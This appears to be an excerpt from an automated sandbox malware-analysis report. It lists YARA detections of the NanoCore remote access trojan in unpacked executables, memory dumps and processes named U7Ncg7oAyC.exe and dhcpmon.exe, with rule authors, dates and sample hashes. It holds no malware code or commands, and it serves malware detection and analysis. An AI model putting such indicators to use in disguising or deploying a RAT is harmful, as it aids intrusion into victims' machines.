        Source: 34.2.dhcpmon.exe.3f307ce.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.dhcpmon.exe.2f49658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.2f49658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.2f4e6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.2f4e6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.5160000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.5160000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.5140000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.5140000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.dhcpmon.exe.2f49658.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.2f49658.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
        Source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
        Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
        Source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: U7Ncg7oAyC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
